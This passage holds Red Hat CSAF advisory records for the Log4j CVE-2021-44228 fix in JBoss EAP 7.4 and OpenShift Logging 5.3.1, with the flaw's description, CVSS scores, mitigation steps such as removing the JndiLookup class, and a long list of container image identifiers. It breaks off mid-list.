{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Low" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "A security update is now available for Red Hat JBoss Enterprise Application Platform 7.4.\n\nRed Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.\n\nThis asynchronous patch is a security update for Red Hat JBoss Enterprise Application Platform 7.4.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, see the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5140", "url": "https://access.redhat.com/errata/RHSA-2021:5140" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#low", "url": "https://access.redhat.com/security/updates/classification/#low" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=appplatform\u0026version=7.4", "url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=appplatform\u0026version=7.4" }, { "category": "external", "summary": "https://access.redhat.com/solutions/6577421", "url": "https://access.redhat.com/solutions/6577421" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/", "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/" }, { "category": "external", "summary": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/", "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/" }, { "category": "external", "summary": "2030932", "url": 
"https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5140.json" } ], "title": "Red Hat Security Advisory: Red Hat JBoss Enterprise Application Platform 7.4 security update", "tracking": { "current_release_date": "2024-12-12T01:19:00+00:00", "generator": { "date": "2024-12-12T01:19:00+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5140", "initial_release_date": "2021-12-15T02:59:53+00:00", "revision_history": [ { "date": "2021-12-15T02:59:53+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-15T02:59:53+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:19:00+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "EAP 7.4 log4j async", "product": { "name": "EAP 7.4 log4j async", "product_id": "EAP 7.4 log4j async", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_enterprise_application_platform:7.4" } } } ], "category": "product_family", "name": "Red Hat JBoss Enterprise Application Platform" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. 
A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. 
This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "EAP 7.4 log4j async" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", 
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-15T02:59:53+00:00", "details": "Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "EAP 7.4 log4j async" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5140" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. 
For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "EAP 7.4 log4j async" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "EAP 7.4 log4j async" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Low" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" } ] }
rhsa-2021_5129
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update is now available for OpenShift Logging 5.3.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Openshift Logging Security and Bug Fix Release (5.3.1)\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* netty: Request smuggling via content-length header (CVE-2021-21409)\n\n* netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data (CVE-2021-37136)\n\n* netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5129", "url": "https://access.redhat.com/errata/RHSA-2021:5129" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "1944888", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888" }, { "category": "external", "summary": "2004133", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133" }, { "category": "external", "summary": "2004135", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "LOG-1897", "url": "https://issues.redhat.com/browse/LOG-1897" }, { "category": "external", "summary": "LOG-1925", "url": "https://issues.redhat.com/browse/LOG-1925" }, { "category": "external", "summary": "LOG-1962", "url": "https://issues.redhat.com/browse/LOG-1962" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5129.json" } ], "title": "Red Hat Security Advisory: Openshift Logging security and bug update (5.3.1)", "tracking": { "current_release_date": "2024-12-12T01:17:17+00:00", "generator": { "date": 
"2024-12-12T01:17:17+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5129", "initial_release_date": "2021-12-14T19:37:00+00:00", "revision_history": [ { "date": "2021-12-14T19:37:00+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-14T19:37:00+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:17:17+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "OpenShift Logging 5.3", "product": { "name": "OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3", "product_identification_helper": { "cpe": "cpe:/a:redhat:logging:5.3::el8" } } } ], "category": "product_family", "name": "Red Hat OpenShift Enterprise" }, { "branches": [ { "category": "product_version", "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "product": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.3.1-4" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "product": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "product_id": 
"openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.3.1-3" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "product": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-66" } } }, { "category": "product_version", "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "product": { "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "product_identification_helper": { "purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.0.0-43" } } }, { "category": "product_version", "name": 
"openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x", "product": { "name": "openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x", "product_id": "openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x", "product_identification_helper": { "purl": "pkg:oci/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-46" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "product": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "product_id": "openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "product_identification_helper": { "purl": "pkg:oci/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-65" } } }, { "category": "product_version", "name": "openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "product": { "name": "openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "product_id": "openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "product_identification_helper": { "purl": 
"pkg:oci/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-63" } } }, { "category": "product_version", "name": "openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "product": { "name": "openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "product_id": "openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "product_identification_helper": { "purl": "pkg:oci/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-70" } } }, { "category": "product_version", "name": "openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "product": { "name": "openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "product_id": "openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "product_identification_helper": { "purl": "pkg:oci/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-73" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "product": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "product_id": 
"openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.3.1-4" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "product": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.3.1-3" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "product": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-66" } } }, { "category": "product_version", "name": 
"openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "product": { "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "product_identification_helper": { "purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.0.0-43" } } }, { "category": "product_version", "name": "openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "product": { "name": "openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "product_id": "openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "product_identification_helper": { "purl": "pkg:oci/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-46" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le", "product": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le", "product_id": "openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le", "product_identification_helper": { "purl": 
"pkg:oci/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-65" } } }, { "category": "product_version", "name": "openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "product": { "name": "openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "product_id": "openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "product_identification_helper": { "purl": "pkg:oci/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-63" } } }, { "category": "product_version", "name": "openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "product": { "name": "openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "product_id": "openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "product_identification_helper": { "purl": "pkg:oci/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-70" } } }, { "category": "product_version", "name": "openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "product": { "name": "openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "product_id": 
"openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "product_identification_helper": { "purl": "pkg:oci/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-73" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "product": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.3.1-4" } } }, { "category": "product_version", "name": "openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "product": { "name": "openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "product_id": "openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-operator-bundle\u0026tag=v5.3.1-12" } } }, { "category": "product_version", "name": 
